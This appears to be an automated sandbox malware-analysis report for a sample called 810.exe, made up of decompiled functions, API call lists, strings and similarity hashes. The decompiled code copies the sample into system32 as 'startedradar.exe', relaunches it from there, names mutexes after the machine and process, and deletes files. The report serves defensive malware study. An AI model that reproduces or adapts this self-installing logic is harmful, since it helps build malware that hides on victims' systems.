GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0011CF3D
CreateWindowExW.USER32(00000000,?,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 0011CF6C

Strings

0, xrefs: 0011CEFD

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: HandleHeapModule$ClassCreateFreeProcessRegisterWindow_snwprintfmemset
String ID: 0
API String ID: 2844751603-4108050209
Opcode ID: 4b50bd0fc574bceb17d4f86369b44b4257faf83c64443a7922fbff48755fc892
Instruction ID: 4a329a64651e4b98c8ee82e61f48f631f2eb9ceaf015353ad0079b1f63955bca
Opcode Fuzzy Hash: 4b50bd0fc574bceb17d4f86369b44b4257faf83c64443a7922fbff48755fc892
Instruction Fuzzy Hash: B9115175940604FBEB359BE0AC49FED7A78FB04745F240015F709B65C0D77051A5CBAA

Uniqueness

Uniqueness Score: 7.75%

Function 0011FEEF, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 45
memorystringUNIQUE

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E0011FEEF(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t13;
				int _t16;
				int _t21;
				void* _t25;
				void* _t30;
				void* _t32;
				void* _t35;
				void* _t44;

				_t44 = __eflags;
				_t30 = __edi;
				_t25 = __ecx;
				asm("popfd");
				asm("int3");
				memset(??, ??, ??);
				GetModuleFileNameW(0, "C:\Users\luketaylor\810.exe", 0x104);
				_push(_t25);
				_t32 = L00111C60(0x124360, 0x2f8, __esi);
				_t29 = _t32;
				L0011F610(0x127cd0, _t32);
				E0011F6F0(HeapFree(GetProcessHeap(), 0, _t32), _t32, _t30, _t32);
				_t13 = L0011F870(); // executed
				L0011F900(_t13, _t32); // executed
				L0011F770(0x127cd0, _t32, _t32, _t44); // executed
				_t16 = lstrcmpiW("C:\Users\luketaylor\810.exe", "C:\Windows\system32\startedradar.exe");
				if(_t16 != 0) {
					L0011FB80(0x127cd0); // executed
					__eflags =  *0x1263cc;
					if( *0x1263cc == 0) {
						goto 0x311ede;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						 *(_t35 - 0x58) = 0x44;
						_t21 = CreateProcessW("C:\Windows\system32\startedradar.exe", 0, 0, 0, 0, 0, 0, 0, _t35 - 0x58, _t35 - 0x10);
						__eflags = _t21;
						if(_t21 != 0) {
							CloseHandle( *(_t35 - 0x10));
							_t21 = CloseHandle( *(_t35 - 0xc));
						}
						goto 0x311ef4;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						return _t21;
					} else {
						L0011FD90(0x127cd0, _t29, _t32); // executed
						return 1;
					}
				} else {
					return _t16; // executed
				}
			}

0x0011feef
0x0011feef
0x0011feef
0x0011feef
0x0011fef0
0x0011fef1
0x0011ff06
0x0011ff0c
0x0011ff1f
0x0011ff21
0x0011ff28
0x0011ff3d
0x0011ff42
0x0011ff47
0x0011ff4c
0x0011ff5b
0x0011ff63
0x0011ff6a
0x0011ff6f
0x0011ff76
0x0011ff87
0x0011ff8c
0x0011ff8d
0x0011ff8e
0x0011ff8f
0x0011ff98
0x0011ffba
0x0011ffc0
0x0011ffc2
0x0011ffc7
0x0011ffd0
0x0011ffd0
0x0011ffd6
0x0011ffdb
0x0011ffdc
0x0011ffdd
0x0011ffde
0x0011ffdf
0x0011ff78
0x0011ff78
0x0011ff86
0x0011ff86
0x0011ff65
0x0011ff69
0x0011ff69

APIs

memset.NTDLL ref: 0011FEF1
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\810.exe,00000104), ref: 0011FF06
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011FF30
HeapFree.KERNEL32(00000000), ref: 0011FF37
lstrcmpiW.KERNEL32(C:\Users\user\810.exe,C:\Windows\system32\startedradar.exe), ref: 0011FF5B

Strings

startedradar, xrefs: 0011FF23
C:\Users\user\810.exe, xrefs: 0011FEFF, 0011FF56
C:\Windows\system32\startedradar.exe, xrefs: 0011FF51

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FileFreeModuleNameProcesslstrcmpimemset
String ID: C:\Users\user\810.exe$C:\Windows\system32\startedradar.exe$startedradar
API String ID: 1471024059-3561196223
Opcode ID: 6180255aa6cb61df6b9c033863bef0bb04616ea0cc521865ca0b34b8b02b6f07
Instruction ID: 00479b184dff2709c6dbabb0b5581d217defa3693eac540e5dfe830dc7076a1d
Opcode Fuzzy Hash: 6180255aa6cb61df6b9c033863bef0bb04616ea0cc521865ca0b34b8b02b6f07
Instruction Fuzzy Hash: 5AF0D131244115B7C62877F47C0F3EA3244AB64756F000438F50D955D1DFA144F386A6

Uniqueness

Uniqueness Score: 100.00%

Function 0011103C, Relevance: 10.5, APIs: 7, Instructions: 49
memorysynchronizationCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E0011103C(void* __esi, void* __eflags) {
				void* _t30;
				long _t54;
				void* _t65;
				void* _t66;
				int _t73;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t85;
				void* _t87;

				 *(_t83 - 4) = 0;
				 *((intOrPtr*)(_t83 - 8)) = GetCurrentProcessId();
				_t73 = 0; // executed
				L00111BE0(E00111000, _t83 - 4); // executed
				_t4 = _t73 + 0x14; // 0x14
				_t72 = _t4;
				_t69 = 0x122000;
				_t76 = L00111D00(0x122000, _t4, 0);
				 *0x1259dc(_t83 - 0x118, 0x40, _t76,  *(_t83 - 4), 0x64da9f26);
				_t87 = _t85 + 0x14;
				HeapFree(GetProcessHeap(), 0, _t76);
				_t30 = CreateMutexW(0, 1, _t83 - 0x118); // executed
				_t65 = _t30;
				if(_t65 == 0) {
					L6:
					goto 0x310045;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("popfd");
					asm("int3");
					_t77 = L00111D00(_t69, _t72, _t73);
					 *0x1259dc(_t83 - 0x118, 0x40, _t77,  *((intOrPtr*)(_t83 - 8)));
					HeapFree(GetProcessHeap(), 0, _t77);
					_t66 = CreateMutexW(0, 1, _t83 - 0x118);
					if(_t66 != 0) {
						goto 0x310062;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("popfd");
						asm("int3");
						_t79 = L00111D00(_t69, _t72, _t73);
						 *0x1259dc(_t83 - 0x98, 0x40, _t79,  *((intOrPtr*)(_t83 - 8)));
						HeapFree(GetProcessHeap(), 0, _t79);
						_t80 = CreateEventW(0, 1, 0, _t83 - 0x98);
						if(_t80 != 0) {
							goto 0x31007f;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							GetModuleFileNameW();
							_push(_t83 - 0x18);
							_push(0x80);
							if(L00111E80(_t80) != 0) {
								WaitForSingleObject(_t80, 0xffffffff);
								CloseHandle( *(_t83 - 0x18));
								CloseHandle( *(_t83 - 0x14));
							}
							CloseHandle(_t80);
						}
						CloseHandle(_t66);
					}
				} else {
					_t54 = GetLastError();
					if(_t54 == 0xb7) {
						_t72 = _t54 + 0x1d;
						_t69 = 0x122020;
						_t81 = L00111D00(0x122020, _t54 + 0x1d, 0);
						 *0x1259dc(_t83 - 0x98, 0x40, _t81,  *(_t83 - 4));
						_t87 = _t87 + 0x14;
						HeapFree(GetProcessHeap(), 0, _t81);
						_t82 = CreateEventW(0, 1, 0, _t83 - 0x98);
						if(_t82 != 0) {
							SetEvent(_t82);
							CloseHandle(_t82);
							_t73 = 1;
						}
					}
					CloseHandle(_t65);
					if(_t73 == 0) {
						goto L6;
					}
				}
				return _t73;
			}

0x0011103c
0x0011104c
0x00111054
0x00111056
0x00111060
0x00111060
0x00111063
0x00111070
0x0011107f
0x00111085
0x00111091
0x001110a1
0x001110a7
0x001110ab
0x00111133
0x00111133
0x00111138
0x00111139
0x0011113a
0x0011113b
0x0011113c
0x0011113d
0x0011113e
0x0011113f
0x00111140
0x00111141
0x0011114a
0x00111159
0x0011116c
0x00111183
0x00111187
0x0011118d
0x00111192
0x00111193
0x00111194
0x00111195
0x00111196
0x00111197
0x00111198
0x00111199
0x0011119a
0x0011119b
0x001111a4
0x001111b3
0x001111c6
0x001111df
0x001111e3
0x001111e5
0x001111ea
0x001111eb
0x001111ec
0x001111ed
0x001111ee
0x001111ef
0x001111f0
0x001111f1
0x001111f2
0x001111f3
0x001111fc
0x001111fd
0x00111212
0x00111217
0x00111220
0x00111229
0x00111229
0x00111230
0x00111230
0x00111237
0x00111237
0x001110b1
0x001110b1
0x001110bc
0x001110c3
0x001110c6
0x001110d3
0x001110e2
0x001110e8
0x001110f4
0x0011110b
0x0011110f
0x00111112
0x00111119
0x0011111f
0x0011111f
0x0011110f
0x00111125
0x0011112d
0x00000000
0x00000000
0x0011112d
0x00111245

APIs

GetCurrentProcessId.KERNEL32 ref: 00111043
_snwprintf.NTDLL ref: 0011107F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011108A
HeapFree.KERNEL32(00000000), ref: 00111091
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 001110A1
GetLastError.KERNEL32 ref: 001110B1
CloseHandle.KERNEL32(00000000), ref: 00111125

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: HeapProcess$CloseCreateCurrentErrorFreeHandleLastMutex_snwprintf
String ID:
API String ID: 2918715589-0
Opcode ID: 5fdbd96b548703ae34a58e0959b51fa2cdf20194a3c2a8c5fa5684b3fdc1d03b
Instruction ID: 1d11656642a77170f76bf836dbb9a56d3206a73cc34902d87590fcffd290e135
Opcode Fuzzy Hash: 5fdbd96b548703ae34a58e0959b51fa2cdf20194a3c2a8c5fa5684b3fdc1d03b
Instruction Fuzzy Hash: 7401F571A04205FBDB259BE0EC89BEDB779EB84342F100065F709D2541DB315AE28B51

Uniqueness

Uniqueness Score: 3.75%

Function 0011F8B4, Relevance: 9.0, APIs: 6, Instructions: 22
fileCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E0011F8B4() {
				void* _t1;
				int _t3;
				void* _t7;
				void* _t9;
				void* _t11;

				_t1 = MapViewOfFile(); // executed
				_t7 = _t1;
				if(_t7 != 0) {
					 *0x125a0c = RtlComputeCrc32(0, _t7, GetFileSize(_t11, 0));
					UnmapViewOfFile(_t7);
				}
				CloseHandle(_t9);
				_t3 = CloseHandle(_t11);
				return _t3;
			}

0x0011f8b4
0x0011f8ba
0x0011f8be
0x0011f8d4
0x0011f8d9
0x0011f8d9
0x0011f8e0
0x0011f8e8
0x0011f8f0

APIs

MapViewOfFile.KERNELBASE ref: 0011F8B4
GetFileSize.KERNEL32(?,00000000), ref: 0011F8C3
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0011F8CD
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0011F8D9
CloseHandle.KERNEL32 ref: 0011F8E0
CloseHandle.KERNEL32 ref: 0011F8E8

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: File$CloseHandleView$ComputeCrc32SizeUnmap
String ID:
API String ID: 741204879-0
Opcode ID: f49e51765e58065f0c7ad969c16203f56355b168b026f24fde2cf91df2c66ba5
Instruction ID: db0605ed810497d7ae34edd2212c1bc29d290e7e4846e95307b78846c7adb2e4
Opcode Fuzzy Hash: f49e51765e58065f0c7ad969c16203f56355b168b026f24fde2cf91df2c66ba5
Instruction Fuzzy Hash: 7DE0B672200A04FBE7212BE5BCCCBAE7A69FB58722F004425F20181860CB7548E38F61

Uniqueness

Uniqueness Score: 0.01%

Function 0011F90A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
memoryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E0011F90A(DWORD* __eax, void* __esi) {
				int _t14;
				void* _t15;
				intOrPtr _t20;
				void* _t21;
				int _t24;
				char _t27;
				void* _t33;
				void* _t36;
				void* _t38;
				void* _t40;

				_t35 = __esi;
				 *(_t38 - 4) = 0x10;
				_t14 = GetComputerNameW(_t38 - 0x34, __eax); // executed
				if(_t14 == 0) {
					L12:
					 *(_t38 - 0x14) = 0x58;
					L13:
					goto 0x311c88;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("popfd");
					asm("int3");
					_t15 = L00111C60(_t32, 0x58, _t35);
					_t36 = _t15;
					 *0x125858("536720_3C4E0000", 0x104, _t36, _t38 - 0x14,  *0x126d58);
					return HeapFree(GetProcessHeap(), 0, _t36);
				}
				_t33 = _t38 - 0x34;
				_t20 = E00111350(_t33);
				_push(_t33);
				 *0x12610c = _t20;
				_t32 = 0x123cc0;
				_t21 = L00111C60(0x123cc0, 0x58, __esi);
				_t40 = _t40 + 4;
				_t35 = _t21;
				_t24 = WideCharToMultiByte(0, 0x400, _t38 - 0x34, 0xffffffff, _t38 - 0x14, 0x10, _t35, 0);
				HeapFree(GetProcessHeap(), 0, _t35);
				if((0 | _t24 > 0x00000000) == 0) {
					goto L12;
				}
				_t32 = _t38 - 0x14;
				if( *(_t38 - 0x14) == 0) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t27 =  *_t32;
					if(_t27 < 0x30 || _t27 > 0x39) {
						if(_t27 < 0x61 || _t27 > 0x7a) {
							if(_t27 < 0x41 || _t27 > 0x5a) {
								 *_t32 = 0x58;
							}
						}
					}
					_t32 = _t32 + 1;
				} while ( *_t32 != 0);
				goto L13;
			}

0x0011f90a
0x0011f90a
0x0011f916
0x0011f91e
0x0011f9ad
0x0011f9ad
0x0011f9b3
0x0011f9b3
0x0011f9b8
0x0011f9b9
0x0011f9ba
0x0011f9bb
0x0011f9bc
0x0011f9bd
0x0011f9be
0x0011f9c9
0x0011f9da
0x0011f9f7
0x0011f9f7
0x0011f925
0x0011f928
0x0011f92d
0x0011f933
0x0011f938
0x0011f93d
0x0011f942
0x0011f945
0x0011f95d
0x0011f974
0x0011f97d
0x00000000
0x00000000
0x0011f983
0x0011f986
0x00000000
0x00000000
0x00000000
0x00000000
0x0011f988
0x0011f988
0x0011f988
0x0011f98c
0x0011f994
0x0011f99c
0x0011f9a2
0x0011f9a2
0x0011f99c
0x0011f994
0x0011f9a5
0x0011f9a6
0x00000000

APIs

GetComputerNameW.KERNEL32(?), ref: 0011F916
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 0011F95D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F96D
HeapFree.KERNEL32(00000000), ref: 0011F974

Strings

X, xrefs: 0011F9AD

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$ByteCharComputerFreeMultiNameProcessWide
String ID: X
API String ID: 4005268116-3081909835
Opcode ID: 50b809e94e1a2ec8b66fabf505085f6da7d447c85d56e5e7c84266934bb7c9aa
Instruction ID: 19c1d65a5994ab11c16ce8da32dcd39d08d01866bd9ee948027e58cb6c89c169
Opcode Fuzzy Hash: 50b809e94e1a2ec8b66fabf505085f6da7d447c85d56e5e7c84266934bb7c9aa
Instruction Fuzzy Hash: A1112B71A4420DBAEF28EB949D45BEE77699F01308F10003DF541F5091D7708ADBC766

Uniqueness

Uniqueness Score: 3.75%

Function 0011F7C2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
memoryfileCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E0011F7C2(void* __esi) {
				int _t11;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t18;

				asm("popfd");
				asm("int3");
				_t16 = L00111D00(_t12, _t13, _t14);
				 *0x1259dc(_t18 - 0x208, 0x104, _t16, "C:\Windows\system32", _t18 - 0x410);
				HeapFree(GetProcessHeap(), 0, _t16);
				_t11 = DeleteFileW(_t18 - 0x208); // executed
				return _t11;
			}

0x0011f7c2
0x0011f7c3
0x0011f7c9
0x0011f7e4
0x0011f849
0x0011f856
0x0011f860

APIs

_snwprintf.NTDLL ref: 0011F7E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F842
HeapFree.KERNEL32(00000000), ref: 0011F849
DeleteFileW.KERNELBASE(?), ref: 0011F856

Strings

C:\Windows\system32, xrefs: 0011F7D2

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$DeleteFileFreeProcess_snwprintf
String ID: C:\Windows\system32
API String ID: 3158849725-2896066436
Opcode ID: eef789d6fd5b67e82ab505ad1574aa7bc46b5641bcb60bc8e301702ef12151f6
Instruction ID: 320b7f745662da0ce5948921ffa34ab64cea9d77d015d8e0a359ef6079647254
Opcode Fuzzy Hash: eef789d6fd5b67e82ab505ad1574aa7bc46b5641bcb60bc8e301702ef12151f6
Instruction Fuzzy Hash: 86E09272801319BBCB24ABA0AC4EBEA372CEB14316F0005A2F609D6451DA7045E28B91

Uniqueness

Uniqueness Score: 16.53%

Function 0011FCAD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25
memoryfileUNIQUE

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E0011FCAD(void* __edi, void* __esi) {
				void* _t11;
				void* _t12;
				void* _t16;
				void* _t18;

				asm("popfd");
				asm("int3");
				_t16 = L00111D00(_t11, _t12, __edi);
				 *0x1259dc(_t18 - 0x430, 0x104, _t16, "C:\Windows\system32\startedradar.exe");
				HeapFree(GetProcessHeap(), 0, _t16);
				DeleteFileW(_t18 - 0x430); // executed
				return __edi;
			}

0x0011fcad
0x0011fcae
0x0011fcb4
0x0011fcc8
0x0011fcdb
0x0011fce8
0x0011fcf5

APIs

_snwprintf.NTDLL ref: 0011FCC8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011FCD4
HeapFree.KERNEL32(00000000), ref: 0011FCDB
DeleteFileW.KERNELBASE(?), ref: 0011FCE8

Strings

C:\Windows\system32\startedradar.exe, xrefs: 0011FCBC

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$DeleteFileFreeProcess_snwprintf
String ID: C:\Windows\system32\startedradar.exe
API String ID: 3158849725-941650888
Opcode ID: 84904df7fa01dc4accc9e57a692ae1a41025758fe2207ee55888b66bb1c23190
Instruction ID: a8991918b165e2bdda2a762c0800292d22fa6328ccef9a80e2bed2564651705a
Opcode Fuzzy Hash: 84904df7fa01dc4accc9e57a692ae1a41025758fe2207ee55888b66bb1c23190
Instruction Fuzzy Hash: 95E0D871600214B7CB2067E4AC4EB9F371DEB0036BF040591F709D6440C57045A187A0

Uniqueness

Uniqueness Score: 100.00%

Function 0011FB9A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
UNIQUE

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E0011FB9A(void* __ecx) {
				void* __edi;
				int _t32;
				int _t51;
				void* _t54;
				int _t55;
				void* _t58;
				void* _t60;
				void* _t62;
				void* _t63;

				_t53 = __ecx;
				memset(??, ??, ??); // executed
				L00111250(); // executed
				memset(_t60 - 0x20, _t55, 0x1e);
				_t63 = _t62 + 0x18;
				 *((intOrPtr*)(_t60 - 0x1c)) = 1;
				 *((intOrPtr*)(_t60 - 0x18)) = 0x1283f8;
				 *((intOrPtr*)(_t60 - 0x14)) = 0x127ee0;
				 *((short*)(_t60 - 0x10)) = 0xe14;
				_t32 = SHFileOperationW(_t60 - 0x20); // executed
				if(_t32 != 0 ||  *((intOrPtr*)(_t60 - 0xe)) != _t55) {
					goto 0x311da0;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					GetTempPathW();
					GetTempFileNameW(_t60 - 0x228, 0, 0, _t60 - 0x228);
					memset(_t60 - 0x20, 0, 0x1e);
					_t63 = _t63 + 0xc;
					 *((intOrPtr*)(_t60 - 0x1c)) = 1;
					 *((intOrPtr*)(_t60 - 0x18)) = 0x127ee0;
					 *((intOrPtr*)(_t60 - 0x14)) = _t60 - 0x228;
					 *((short*)(_t60 - 0x10)) = 0xe14;
					if(SHFileOperationW(_t60 - 0x20) == 0 &&  *((intOrPtr*)(_t60 - 0xe)) == _t55) {
						goto 0x311dba;
						asm("int3");
						asm("int3");
						memset();
						_t63 = _t63 + 0xc;
						 *((intOrPtr*)(_t60 - 0x1c)) = 1;
						 *((intOrPtr*)(_t60 - 0x18)) = 0x1283f8;
						 *((intOrPtr*)(_t60 - 0x14)) = 0x127ee0;
						 *((short*)(_t60 - 0x10)) = 0xe14;
						_t51 = SHFileOperationW(_t60 - 0x20);
						if(_t51 != 0 ||  *((intOrPtr*)(_t60 - 0xe)) != _t55) {
							_t53 = _t60 - 0x228;
							_t55 = 0;
							L001112F0(_t51, _t60 - 0x228, _t54);
						} else {
							_t23 = _t51 + 1; // 0x1
							_t55 = _t23;
						}
					}
				}
				goto 0x311de2;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("popfd");
				asm("int3");
				_t58 = L00111D00(_t53, _t54, _t55);
				 *0x1259dc(_t60 - 0x430, 0x104, _t58, "C:\Windows\system32\startedradar.exe");
				HeapFree(GetProcessHeap(), 0, _t58);
				DeleteFileW(_t60 - 0x430); // executed
				return _t55;
			}

0x0011fb9a
0x0011fb9a
0x0011fba0
0x0011fbac
0x0011fbb2
0x0011fbb5
0x0011fbbf
0x0011fbcb
0x0011fbd2
0x0011fbd7
0x0011fbdf
0x0011fbea
0x0011fbef
0x0011fbf0
0x0011fbf1
0x0011fbf2
0x0011fbf3
0x0011fbf4
0x0011fbf5
0x0011fbf6
0x0011fc08
0x0011fc16
0x0011fc1c
0x0011fc1f
0x0011fc2c
0x0011fc33
0x0011fc39
0x0011fc46
0x0011fc4d
0x0011fc52
0x0011fc53
0x0011fc54
0x0011fc5a
0x0011fc5d
0x0011fc67
0x0011fc6e
0x0011fc75
0x0011fc7a
0x0011fc82
0x0011fc93
0x0011fc99
0x0011fc9b
0x0011fc89
0x0011fc89
0x0011fc89
0x0011fc89
0x0011fc82
0x0011fc46
0x0011fca0
0x0011fca5
0x0011fca6
0x0011fca7
0x0011fca8
0x0011fca9
0x0011fcaa
0x0011fcab
0x0011fcac
0x0011fcad
0x0011fcae
0x0011fcb4
0x0011fcc8
0x0011fcdb
0x0011fce8
0x0011fcf5

APIs

memset.NTDLL ref: 0011FB9A
memset.NTDLL ref: 0011FBAC
SHFileOperationW.SHELL32(?), ref: 0011FBD7

Strings

C:\Users\user\810.exe, xrefs: 0011FBBF
C:\Windows\system32\startedradar.exe, xrefs: 0011FBCB

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: memset$FileOperation
String ID: C:\Users\user\810.exe$C:\Windows\system32\startedradar.exe
API String ID: 1137840942-2843632137
Opcode ID: 5b4316f809268a56e77283a3b236a8884aef147239eff4fe2101c67070b2d817
Instruction ID: 19367168c13ede0397a8aeb14be24d1277e1df592fecf4081e82b83eadcaf514
Opcode Fuzzy Hash: 5b4316f809268a56e77283a3b236a8884aef147239eff4fe2101c67070b2d817
Instruction Fuzzy Hash: DDE03970C01219EBCF24DF90EC48AEEBA78BF04398FA00429E601B6540D77486E5CBA6

Uniqueness

Uniqueness Score: 100.00%

Function 0011F7FE, Relevance: 7.5, APIs: 5, Instructions: 29
memoryfileCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0011F7FE(void* __esi) {
				void* _t7;
				int _t14;
				void* _t17;
				void* _t19;
				void* _t21;

				 *0x125a94();
				_t19 = L00111D00(0x1240a0, 0xf0, _t17);
				_t7 = _t21 - 0x410;
				 *0x1259dc(_t21 - 0x208, 0x104, _t19, _t21 - 0x618, _t7, _t7, 0x67165621);
				HeapFree(GetProcessHeap(), 0, _t19);
				_t14 = DeleteFileW(_t21 - 0x208); // executed
				return _t14;
			}

0x0011f7fe
0x0011f818
0x0011f81a
0x0011f836
0x0011f849
0x0011f856
0x0011f860

APIs

SHGetFolderPathW.SHELL32 ref: 0011F7FE
_snwprintf.NTDLL ref: 0011F836
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F842
HeapFree.KERNEL32(00000000), ref: 0011F849
DeleteFileW.KERNELBASE(?), ref: 0011F856

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$DeleteFileFolderFreePathProcess_snwprintf
String ID:
API String ID: 1111569652-0
Opcode ID: a40f241c4bffad6b49aedb1ef5d78bf33a89c3bf9f0dcf64370f016138304de7
Instruction ID: aa46f96ed87f2735db1cb9fdb711ad3d817210fb16bfcb7ee9c40a656837dac9
Opcode Fuzzy Hash: a40f241c4bffad6b49aedb1ef5d78bf33a89c3bf9f0dcf64370f016138304de7
Instruction Fuzzy Hash: EDF03772901128BBDB209BE0EC8DFEB776DEB04356F000192F609D6452DA7149F18BA0

Uniqueness

Uniqueness Score: 7.75%

Function 0011D008, Relevance: 7.5, APIs: 5, Instructions: 18
windowsynchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

TranslateMessage.USER32(?), ref: 0011CFD9
DispatchMessageW.USER32(?), ref: 0011CFE3
WaitForSingleObject.KERNEL32(00000000), ref: 0011CFF1
GetMessageW.USER32 ref: 0011D008
DestroyWindow.USER32 ref: 0011D013

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Message$DestroyDispatchObjectSingleTranslateWaitWindow
String ID:
API String ID: 710846951-0
Opcode ID: 47a7d3e0ee4cf767ad9e6cef56691193682eb5570ff0a7108092fca5213e59ab
Instruction ID: 14afa2b206afdaf89f37b9ddbac6c0cc3d7a6c6516b984b0ece4e48a9af922f0
Opcode Fuzzy Hash: 47a7d3e0ee4cf767ad9e6cef56691193682eb5570ff0a7108092fca5213e59ab
Instruction Fuzzy Hash: D0E0EC71900145FBDB296BB4EC4DBED3B7DEB05702F204020F162D68A0E73494E79B21

Uniqueness

Uniqueness Score: 0.03%

Function 000F2493, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 29stringCOMMON

APIs

lstrcmpW.KERNELBASE ref: 000F24E5

Strings

ov8oTdn, xrefs: 000F24B2, 000F24C7
